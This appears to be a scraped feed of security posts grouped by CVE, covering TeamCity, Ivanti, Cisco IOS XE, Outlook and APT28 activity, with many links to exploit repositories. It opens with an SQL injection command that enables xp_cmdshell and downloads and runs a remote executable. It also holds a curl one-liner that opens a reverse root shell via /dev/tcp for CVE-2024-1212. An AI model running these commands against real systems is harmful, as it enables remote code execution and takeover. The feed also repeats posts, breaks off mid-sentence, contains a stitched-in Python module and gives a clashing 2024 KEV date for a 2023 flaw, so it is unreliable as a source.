echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013
##updated 2024-03-21T05:01:12
2 posts
9 repos
https://github.com/yoryio/CVE-2024-27198
https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT
https://github.com/passwa11/CVE-2024-27198-RCE
https://github.com/rampantspark/CVE-2024-27198
https://github.com/CharonDefalt/CVE-2024-27198-RCE
https://github.com/Stuub/RCity-CVE-2024-27198
https://github.com/Chocapikk/CVE-2024-27198
https://github.com/W01fh4cker/CVE-2024-27198-RCE
https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-
JetBrains TeamCity 2024.03.1 Is Here
Ah shit here we go again. JetBrains, notoriously averse to sharing vulnerability details, mentions 2 security problems being fixed in their TeamCity 2024.03.1 Release Notes but does not provide CVE IDs.
Why you should care about updating TeamCity:
A previous TeamCity vulnerability CVE-2024-27198 (9.8 critical, disclosed 04 March 2024, authentication bypass to create a new administrative user) was exploited within 24 hours of public disclosure (and release of their proofs of concept). It was added to CISA's KEV Catalog 3 days later.
##updated 2024-03-13T14:25:02.043000
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-08T18:30:35
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-08T18:30:35
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-07T13:52:27.110000
2 posts
CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.
#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel
##updated 2024-02-22T15:30:39
2 posts
2 repos
CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.
#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel
##updated 2024-02-21T18:31:06
4 posts
1 repos
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##CVE-2024-1212 reverse root shell:
curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"
##updated 2024-02-15T18:40:48.837000
2 posts
1 repos
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##updated 2024-02-09T05:11:32
2 posts
4 repos
https://github.com/h4x0r-dz/CVE-2024-21893.py
https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
@nf3xn While MITRE seems like a small fry, Forbes probably explained it best: Inside America's Secretive $2 Billion Research Hub: Collecting Fingerprints from Facebook, Hacking Smartwatches, and Fighting Covid-19 (13 July 2020)
MITRE was one of several targets. To show how dangerous and how massively exploited Ivanti was to the U.S. Government, the CVE-2024-21893 (Ivanti Connect Secure/Policy Secure/Neurons Server-Side Request Forgery (SSRF) Vulnerability) was added to the Known Exploited Vulnerabilities Catalog 31 January 2024 with a due date of 02 February 2024, two days later. For reference, most KEV entries have 2-3 weeks to remediate.
Fun fact, CISA announced a second set of CVEs to the KEV Catalog on 10 January and 31 January 2024... both times for Ivanti's actively exploited zero-days. I don't recall CISA ever adding additional KEV entries instead of just waiting until the next day.
##updated 2024-02-03T05:07:29
2 posts
28 repos
https://github.com/IceBreakerCode/CVE-2023-20198
https://github.com/Shadow0ps/CVE-2023-20198-Scanner
https://github.com/alekos3/CVE_2023_20198_Detector
https://github.com/sohaibeb/CVE-2023-20198
https://github.com/codeb0ss/CVE-2023-20198-PoC
https://github.com/RevoltSecurities/CVE-2023-20198
https://github.com/ohlawd/CVE-2023-20198
https://github.com/netbell/CVE-2023-20198-Fix
https://github.com/alekos3/CVE_2023_20198_Remediator
https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198
https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner
https://github.com/JoyGhoshs/CVE-2023-20198
https://github.com/kacem-expereo/CVE-2023-20198
https://github.com/Atea-Redteam/CVE-2023-20198
https://github.com/Pushkarup/CVE-2023-20198
https://github.com/securityphoenix/cisco-CVE-2023-20198-tester
https://github.com/smokeintheshell/CVE-2023-20198
https://github.com/raystr-atearedteam/CVE-2023-20198-checker
https://github.com/Vulnmachines/Cisco_CVE-2023-20198
https://github.com/vulncheck-oss/cisco-ios-xe-implant-scanner
https://github.com/hackingyseguridad/nmap
https://github.com/iveresk/cve-2023-20198
https://github.com/fox-it/cisco-ios-xe-implant-detection
https://github.com/ZephrFish/CVE-2023-20198-Checker
https://github.com/W01fh4cker/CVE-2023-20198-RCE
https://github.com/Tounsi007/CVE-2023-20198
🚨EXPLOIT POC🚨PoC for CVE-2023-20198 Cisco IOS XE RCE and query released by @W01fh4cker.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Cisco #Infosec #CTI #CVE202320198 #Vulnerability
GitHub: https://github.com/W01fh4cker/CVE-2023-20198-RCE
X Link: https://twitter.com/DarkWebInformer/status/1784360877132525857
##updated 2024-02-02T18:30:29
2 posts
6 repos
https://github.com/adminlove520/CVE-2024-0204
https://github.com/cbeek-r7/CVE-2024-0204
https://github.com/gobysec/GobyVuls
https://github.com/horizon3ai/CVE-2024-0204
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##updated 2024-01-22T17:15:09.523000
2 posts
12 repos
MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!
#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK
##updated 2024-01-22T17:15:09.080000
2 posts
8 repos
MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!
#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK
##updated 2023-12-29T20:15:55.393000
2 posts
An elevation of privilege vulnerability exists in Microsoft Windows when Folder redirection has been enabled via Group Policy. When folder redirection file server is co-located with Terminal server, an attacker who successfully exploited the vulnerability would be able to begin redirecting another user's personal data to a created folder.
To exploit the vulnerability, an attacker can cre
Group Policy Folder Redirection CVE-2021-26887
Two years ago (March 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...
🔗️ [Decoder] https://link.is.it/bp55iz
##updated 2023-12-19T15:30:29
2 posts
@cR0w @reverseics There's a timeless argument about whether or not hardcoded default credentials are a vulnerability worthy of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2023-12-08T05:05:23
2 posts
##Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2023-12-06T02:15:07.187000
5 posts
SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
#CVE-2023-4473 #CVE-2023-4474
https://isc.sans.edu/diary/rss/30884
Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##updated 2023-12-06T02:15:07.063000
5 posts
SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
#CVE-2023-4473 #CVE-2023-4474
https://isc.sans.edu/diary/rss/30884
Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##updated 2023-11-28T22:24:39
2 posts
26 repos
Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using the Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add an authentication requirement (see advisory for details).
See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114
Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.
##updated 2023-11-20T18:04:21.453000
2 posts
SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##updated 2023-11-07T03:39:36.897000
2 posts
100 repos
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-11-07T02:18:10.590000
2 posts
65 repos
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-11-05T05:04:43
2 posts
1 repos
@cR0w @reverseics There's a timeless argument about whether or not hardcoded default credentials are a vulnerability worthy of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2023-10-23T01:15:07.550000
4 posts
43 repos
CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations
By Cluster25 Threat Intel Team, October 12, 2023
🔗️ [Duskrise] https://link.is.it/a27zga
##Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.
##updated 2023-08-16T18:30:19
2 posts
In light of recent events, probably best to make this ASA vuln public in public interest: https://github.com/GossiTheDog/Exploits/blob/main/Cisco-CVE-2020-3259.sh
If you get <argument> back with token inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.
The path exists even with webvpn disabled, it's the host checker.
Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen
Akira and others have been living off this for a while.
##updated 2023-08-11T15:15:09.760000
1 posts
2 repos
@hrbrmstr Oh the Tuesday blog post. Here's a direct link to Fortinet's: https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
##updated 2023-08-08T14:22:24.967000
4 posts
2 repos
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-07-13T19:55:55.293000
2 posts
SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
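The rule quoted above (trailing dots dropped from every path element, trailing spaces from the last one) is what makes a literal name and its normalized name diverge. The following is an added example, not SafeBreach's or Microsoft's code: it models only that quoted rule, reports which elements of a path would be rewritten, and gives a simple input-validation check that rejects untrusted file names the rule would alter. The `\\?\` verbatim-prefix handling reflects documented Win32 behaviour; everything else (function names, the "." / ".." exclusion, the sample paths) is this example's own assumption.

```python
"""Model of the quoted DOS-to-NT normalization rule, plus a validator.

Hypothetical example, not SafeBreach's or Microsoft's code. It models only
the rule quoted in the post: trailing dots are removed from every path
element and trailing spaces from the last element. Real Win32
normalization also handles forward slashes, 8.3 names, reserved device
names and more; those are out of scope here. Paths are backslash
separated; "." and ".." elements are left alone because they are
directory references, not names (assumption of this model).
"""
from __future__ import annotations

VERBATIM_PREFIX = "\\\\?\\"  # the Win32 \\?\ prefix bypasses this normalization


def _is_dot_dir(element: str) -> bool:
    return element in (".", "..")


def normalize_dos_path(path: str) -> str:
    """Apply the quoted MagicDot rule to a backslash-separated DOS path."""
    if path.startswith(VERBATIM_PREFIX):
        return path  # verbatim paths reach NT unchanged
    parts = path.split("\\")
    out: list[str] = []
    last = len(parts) - 1
    for i, element in enumerate(parts):
        if _is_dot_dir(element):
            out.append(element)
            continue
        if i == last:
            # Last element: trailing dots and spaces, in any order, are dropped.
            element = element.rstrip(". ")
        else:
            # Every other element: only trailing dots are dropped.
            element = element.rstrip(".")
        out.append(element)
    return "\\".join(out)


def magic_elements(path: str) -> list[tuple[int, str]]:
    """Return (index, element) for every element normalization would change.

    A non-empty result means a file created under the literal name (for
    example through the \\?\ prefix) is addressed by a different name by
    normalizing APIs, which is the concealment/impersonation primitive
    the post describes.
    """
    original = path.split("\\")
    normalized = normalize_dos_path(path).split("\\")
    return [(i, o) for i, (o, n) in enumerate(zip(original, normalized)) if o != n]


def is_magic_path(path: str) -> bool:
    return bool(magic_elements(path))


def is_plain_name(name: str) -> bool:
    """Input-validation check for a single file name from an untrusted source.

    False for names containing a separator and for names normalization
    would rewrite (so the stored name and the name the caller believes it
    used would differ).
    """
    if "\\" in name or "/" in name:
        return False
    return not is_magic_path(name)


if __name__ == "__main__":
    # Constructed sample paths.
    for p in (r"C:\Users\victim\secret.txt.", r"C:\Windows\System32\notepad.exe ", r"C:\..\x"):
        print(f"{p!r:42} -> {normalize_dos_path(p)!r}  magic={is_magic_path(p)}")
```

The useful defensive call is `is_plain_name()`: any name for which it returns False will not round-trip through a normalizing API, so a service that stores attacker-supplied file names should reject it rather than let the on-disk name and the displayed name drift apart.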
##updated 2023-04-27T19:15:14.917000
2 posts
1 repos
https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746
LocalPotato HTTP edition
Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...
🔗️ [Decoder] https://link.is.it/ikv1ph
##updated 2023-04-26T19:27:52.350000
6 posts
Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.
#Goldoon #DLink #CVE_2015_2051 #botnet #cybercrime #IOC #threatintel
##In their latest article Fortinet's Cara Lin & Vincent Li provide detailed insights into the propagation and actions of the Goldoon botnet targeting D-Link devices vulnerable to CVE-2015-2051. https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices
##updated 2023-04-11T21:15:13.240000
2 posts
EoP via Arbitrary File Write/Overwrite in Group Policy Client “gpsvc” – CVE-2022-37955
Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...
🔗️ [Decoder] https://link.is.it/wewm9y
##updated 2023-04-06T05:08:38
1 posts
6 repos
https://github.com/infobyte/CVE-2023-21036
https://github.com/qixils/AntiCropalypse
https://github.com/frankthetank-music/Acropalypse-Multi-Tool
https://github.com/notaSWE/gocropalypse
@sonia_seddiki explaining the aCropalypse vulnerability in PNG files, at @devoxxfr
Scary 😱
https://www.devoxx.fr/schedule/talk/?id=50194
https://en.wikipedia.org/wiki/ACropalypse
https://www.cve.org/CVERecord?id=CVE-2023-21036
##updated 2023-03-29T05:07:23
4 posts
29 repos
https://github.com/tiepologian/CVE-2023-23397
https://github.com/SecCTechs/CVE-2023-23397
https://github.com/ahmedkhlief/CVE-2023-23397-POC
https://github.com/madelynadams9/CVE-2023-23397-Report
https://github.com/securiteinfo/expl_outlook_cve_2023_23397_securiteinfo.yar
https://github.com/moneertv/CVE-2023-23397
https://github.com/Zeppperoni/CVE-2023-23397-Patch
https://github.com/vlad-a-man/CVE-2023-23397
https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY
https://github.com/ducnorth2712/CVE-2023-23397
https://github.com/alicangnll/CVE-2023-23397
https://github.com/djackreuter/CVE-2023-23397-PoC
https://github.com/api0cradle/CVE-2023-23397-POC-Powershell
https://github.com/Trackflaw/CVE-2023-23397
https://github.com/ka7ana/CVE-2023-23397
https://github.com/Pushkarup/CVE-2023-23397
https://github.com/BronzeBee/cve-2023-23397
https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397
https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook
https://github.com/j0eyv/CVE-2023-23397
https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT
https://github.com/im007/CVE-2023-23397
https://github.com/jacquesquail/CVE-2023-23397
https://github.com/grn-bogo/CVE-2023-23397
https://github.com/alsaeroth/CVE-2023-23397-POC
https://github.com/TheUnknownSoul/CVE-2023-23397-PoW
https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell
U.S. Department of State: The United States Condemns Malicious Cyber Activity Targeting Germany, Czechia, and Other EU Member States
The United States joins Germany and Czech Republic in condemning Russian Federation and APT28 for the 2023 cyberattacks against Germany, Czechia, Lithuania, Poland, Slovakia, and Sweden. "Russia’s pattern of behavior blatantly disregards the Framework for Responsible State Behavior in Cyberspace, as affirmed by all United Nations Member States."
The U.S. State Department is the only government agency that discloses the "previously unknown" Outlook vulnerability as CVE-2023-23397.
h/t @w7voa
#Czech #Germany #CzechRepublic #Russia #cyberespionage #APT28 #news #CVE_2023_23397 #vulnerability #eitw #Outlook #USStateDept
##The Guardian: Germany summons Russian envoy over 2023 cyber-attacks
Germany attributed a series of cyberattacks against the defense and technology sector in 2023 to Russian military intelligence, specifically APT28. APT28, aka Forest Blizzard and Fancy Bear, is attributed to the Russian Main Intelligence Directorate (GRU) Military Unit 26165 by the U.S. Government. "It exploited a then unknown vulnerability in the Microsoft Outlook email service and, according to German officials, compromised the servers of affected companies." While the Guardian doesn't identify the Outlook vulnerability, it is likely CVE-2023-23397 (9.8 critical, disclosed 14 March 2023 by Microsoft as an exploited zero-day, added to KEV Catalog same day), whose exploitation Microsoft linked to APT28.
#Germany #Russia #APT28 #ForestBlizzard #cyberespionage #CVE_2023_23397 #news
##updated 2023-02-03T05:02:37
15 posts
@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.
To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
##Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
#CVE_2022_38028 #eitw #activeexploitation #kev #CISA #KnownExploitedVulnerabilitiesCatalog #Russia #cyberespionage #threatintel
##Russian hackers’ custom tool exploits old Windows Print Spooler flaw (CVE-2022-38028) https://www.helpnetsecurity.com/2024/04/23/cve-2022-38028-exploits/ #cyberespionage #Don'tmiss #Microsoft #Hotstuff #exploit #Windows #0-day #News #APT #CVE
##The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). https://thehackernews.com/2024/04/russias-apt28-exploited-windows-print.html
##@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:
##Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
@dangoodin Should your post read CVE-2022-38028?
##Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-38028
##Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
cc: @serghei @campuscodi @briankrebs @jwarminsky
#APT28 #cyberespionage #Russia #FancyBear #ForestBlizzard #CVE_2022_38028 #eitw #activeexploitation #GooseEgg
##updated 2023-02-02T05:01:39
4 posts
9 repos
https://github.com/rxwx/CVE-2017-8570
https://github.com/sasqwatch/CVE-2017-8570
https://github.com/erfze/CVE-2017-8570
https://github.com/Drac0nids/CVE-2017-8570
https://github.com/5l1v3r1/rtfkit
https://github.com/erfze/CVE-2017-0261
https://github.com/MaxSecurity/Office-CVE-2017-8570
The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. https://www.darkreading.com/cyberattacks-data-breaches/military-tank-manual-zero-day-ukraine-cyberattack
##Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
